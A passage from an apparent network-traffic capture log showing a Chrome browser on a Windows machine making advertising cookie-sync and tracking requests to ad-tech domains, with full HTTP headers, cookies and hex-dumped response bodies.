2024-10-31 18:19:35 UTC	575	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 31 Oct 2024 18:19:35 GMT server: Kestrel location: https://widget.us.criteo.com/dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 server-processing-duration-in-ticks: 60513 strict-transport-security: max-age=31536000; preload; connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49891	35.214.168.80	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	774	OUT	GET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g HTTP/1.1 Host: gtrace.mediago.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	702	IN	HTTP/1.1 302 Found Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Methods: GET, POST, OPTIONS Location: https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g&google_hm=22210ca75dc45a302agr4j00m2xmr4i5 Set-Cookie: __mguid_=22210ca75dc45a302agr4j00m2xmr4i5; Path=/; Domain=mediago.io; Max-Age=31536000; Secure; SameSite=None Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 8 Content-Type: text/plain; charset=utf-8 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:35 UTC	8	IN	Data Raw: 72 65 64 69 72 65 63 74 Data Ascii: redirect

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49896	35.204.158.49	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	763	OUT	GET /gp_match?google_gid=CAESEAH4BonoisDzvjD0eD3Gsmw&google_cver=1&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq HTTP/1.1 Host: um.simpli.fi Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	1035	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Type: text/html Content-Length: 142 Connection: close Set-Cookie: suid=336FAC20C30146ADB0C6F6BCF75A840A; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:35 GMT; SameSite=none; Secure; Set-Cookie: suid_legacy=336FAC20C30146ADB0C6F6BCF75A840A; Path=/; domain=simpli.fi; Expires=Sat, 01-Nov-25 18:19:35 GMT; Secure; Location: https://cm.g.doubleclick.net/pixel?google_nid=simplifi&google_hm=336FAC20C30146ADB0C6F6BCF75A840A&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq Expires: Wed, 30 Oct 2024 18:19:35 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Content-Type-Options: nosniff Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
2024-10-31 18:19:35 UTC	142	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49898	54.170.20.205	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	776	OUT	GET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof HTTP/1.1 Host: match.prod.bidr.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	538	IN	HTTP/1.1 303 See Other Date: Thu, 31 Oct 2024 18:19:35 GMT location: https://match.prod.bidr.io/cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&_bee_ppp=1 Server: gunicorn set-cookie: checkForPermission=ok; Domain=bidr.io; expires=Thu, 31 Oct 2024 18:29:35 GMT; Path=/; SameSite=None; Secure strict-transport-security: max-age=2592000; includeSubDomains Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49888	35.71.131.137	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	775	OUT	GET /track/cmf/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1 Host: match.adsrvr.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	622	IN	HTTP/1.1 302 Found Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 453 Connection: close server: Kestrel location: https://match.adsrvr.org/track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E set-cookie: TDID=d1b817e5-56c5-45f4-864e-634d6431975b; expires=Fri, 31 Oct 2025 18:19:35 GMT; domain=.adsrvr.org; path=/; secure; samesite=none set-cookie: TDCPM=CAEYBSgCMgsI-O_s4-n4vD0QBTgB; expires=Fri, 31 Oct 2025 18:19:35 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
2024-10-31 18:19:35 UTC	453	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 6f 6f 67 6c 65 3f 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 4c 4a 75 35 2d 37 65 7a 6d 69 53 5a 51 56 79 38 2d 5f 6f 46 44 51 26 67 6f 6f 67 6c 65 5f 63 76 65 72 3d 31 26 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 78 30 4b 75 44 53 5f 35 6f 39 5a 79 36 76 4a 57 30 4b 41 57 63 6f 6f 43 78 64 6d 66 5f 69 7a 73 52 33 53 52 4a 69 56 68 67 36 51 42 4b 76 61 61 73 79 48 4a 78 58 4f 30 39 2d 31 55 6f 5a 38 5f 56 2d 45 4b 46 6c 5f 39 5f 43 33 76 63 6d 6b 61 44 72 56 7a 50 47 4f 4c 72 64 39 56 4e 39 4e 33 45 22 3e 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 Data Ascii: Redirecting to: <a href="https://match.adsrvr.org/track/cmb/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E">https://match.ads

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49893	172.217.18.4	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	804	OUT	GET /ads/measurement/l?ebcid=ALh7CaT6FXIFvZW0DewpsEqJBJb-MJQr7sID113NOOXgib0Cx-XeGuKQUcr0n_lcem5uugkeRxWKqm8lNexqlA8pQp9GUBq5lQ HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://googleads.g.doubleclick.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	314	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:35 GMT Server: jumble_frontend_server Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49901	35.214.168.80	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	774	OUT	GET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ HTTP/1.1 Host: gtrace.mediago.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	702	IN	HTTP/1.1 302 Found Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Methods: GET, POST, OPTIONS Location: https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmSt9V-XvEosgwdO7hh7p0jmvZETv7AYYur3PP_0VA1kMD3uehc9zWkhZYvPw1d4cIrehwUweUItUNBJO3bWkfNSIgQy8JM9jQizFQ&google_hm=22210ca7ce1ae6f72pgi3e00m2xmr4i6 Set-Cookie: __mguid_=22210ca7ce1ae6f72pgi3e00m2xmr4i6; Path=/; Domain=mediago.io; Max-Age=31536000; Secure; SameSite=None Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 8 Content-Type: text/plain; charset=utf-8 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:35 UTC	8	IN	Data Raw: 72 65 64 69 72 65 63 74 Data Ascii: redirect

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49889	52.16.92.15	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	769	OUT	GET /sync/adx?google_gid=CAESEEmQdMAM7E0W-DH6rhDiIxs&google_cver=1&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0 HTTP/1.1 Host: pr-bh.ybp.yahoo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	992	IN	HTTP/1.1 302 Found Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 0 Connection: close Location: https://cm.g.doubleclick.net/pixel?google_nid=yahoo&google_push=AXcoOmSC5XzHMFryMzDkGxghutUO-mvFIJ78eTpuHDkgVH0JaQqClGaoWQeMEbZOwXl-_6VPMlKnpXxaJBwSkNZeCT74kzVwrTTEcm0&google_hm=eS15MDF1d0VSRTJwR3VpcERhbjZhVkN6U2FPbHdJd0xjb35B Age: 0 Strict-Transport-Security: max-age=31536000 Server: ATS Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic Set-Cookie: A3=d=AQABBDfKI2cCEEuI4dM8tJrIE5Rq5AWZyWAFEgEBAQEbJWctZwAAAAAA_eMAAA&S=AQAAAlc6jo4EtfQl0gBYx_awZn4; Expires=Sat, 1 Nov 2025 00:19:35 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49908	35.190.0.66	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	776	OUT	GET /google_pixel?google_gid=CAESEL2a7VS9IX-35Rzq52wUduA&google_cver=1&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw HTTP/1.1 Host: ads.travelaudience.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:35 UTC	800	IN	HTTP/1.1 307 Temporary Redirect Server: nginx/1.21.6 Date: Thu, 31 Oct 2024 18:19:35 GMT Content-Length: 0 Location: https://cm.g.doubleclick.net/pixel?google_nid=ta&google_hm=Fyu-5GbPRWQ6ZIpuIUpEuw&google_push=AXcoOmSrY7ICbKSMUirrf7SY7fPPWmw6Wx0t2MDX6BAA8aQDy1xy3RAKRzdLj7nTAXJsX4R08bXl2xtQtgoiufKBt9jpDiLgb0-rFvw Set-Cookie: _tracker=%7B%22UUID%22%3A%22172BBEE4-66CF-4564-3A64-8A6E214A44BB%22%7D; Path=/; Domain=travelaudience.com; Expires=Mon, 01 Dec 2025 18:19:35 GMT; Max-Age=34214399; Secure; SameSite=None X-Engine-Version: 0.0.0 X-Host: tde-deliveryengine-production-7dc4dc4684-8kzvb P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR LAW CUR DEV PSA PSD IVA OUR BUS UNI COM NAV INT CNT LOC" Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49915	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	1147	OUT	GET /f/AGSKWxVliFzt__e0MUU_SOrGx-lhlS6uQAPdw7fuvmC9ZOEsgVNDhFt6QsFFNlaOQwy5PSsxhxcDWnH1x8vkCo4uTDzz2qaGDiiWUxEb4DdVXaVIkxYLejIwjKuC0DHCYaFx6xUnkqAxgw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzczLDk4NTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiwxNV0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl0sWzIsIltudWxsLFtudWxsLDEsWzE3MzAzOTg3NzQsMjY1MzU5MDAwXV1dIl1dXQ HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:36 UTC	1936	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:36 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-BfmbqXwZyNLK0XG1RsOwSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Cross-Origin-Resource-Policy: cross-origin reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmLw1JBikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhbg5dkzp38kmsOPlE2kljaT8wvjk_LySosyk0pL8orTktNTi1KKy1KJ4IwMjE0MDYwM9A4P4AgMAQfc_iA" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:36 UTC	1936	IN	Data Raw: 62 39 38 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 6a 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 6a 44 2c 5f 2e Data Ascii: b98if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var jD=function(a){this.l=_.t(a)};_.v(jD,_.
2024-10-31 18:19:36 UTC	1039	IN	Data Raw: 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 56 49 33 66 69 4a 2d 33 71 6d 50 5a 65 78 50 69 62 33 51 66 71 63 57 5f 34 47 70 62 4b 37 67 42 5a 42 76 43 43 72 64 35 5f 70 4b 53 46 64 71 66 30 6f 37 42 7a 36 68 4a 6a 62 36 62 4b 4c 32 53 44 6d 38 72 38 4b 2d 58 68 45 39 38 43 76 68 71 45 44 68 67 75 62 50 54 44 55 69 65 75 6b 59 44 30 4d 51 72 5a 66 75 46 39 71 5f 6b 69 4c 39 49 67 4d 55 35 73 4a 45 6f 46 44 5a 63 36 78 46 49 36 4f 72 41 45 7a 37 51 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 5c 78 35 62 6e 75 6c 6c 2c 5c 78 35 62 37 2c 36 2c 31 35 5c 78 35 64 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: \/fundingchoicesmessages.google.com\/f\/AGSKWxVI3fiJ-3qmPZexPib3QfqcW_4GpbK7gBZBvCCrd5_pKSFdqf0o7Bz6hJjb6bKL2SDm8r8K-XhE98CvhqEDhgubPTDUieukYD0MQrZfuF9q_kiL9IgMU5sJEoFDZc6xFI6OrAEz7Q\\\\u003d\\\\u003d\\\x22\x5d,\x5bnull,\x5b7,6,15\x5d,null,null,null,null,
2024-10-31 18:19:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49909	51.89.9.252	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:35 UTC	781	OUT	GET /match/?int_id=19&redir=1&google_gid=CAESEKcM364RUx5QMSs2V2LwRf8&google_cver=1&google_push=AXcoOmSBEqLcMQ1_a7fW7NcT2Iei-MG31IkeZEJ4zsIXZrw5PAIP7aNgsrC8sU8h46pHu40uiZnbXPrhr6kfd4hGeSk-YKS5ry9iw6eT HTTP/1.1 Host: onetag-sys.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
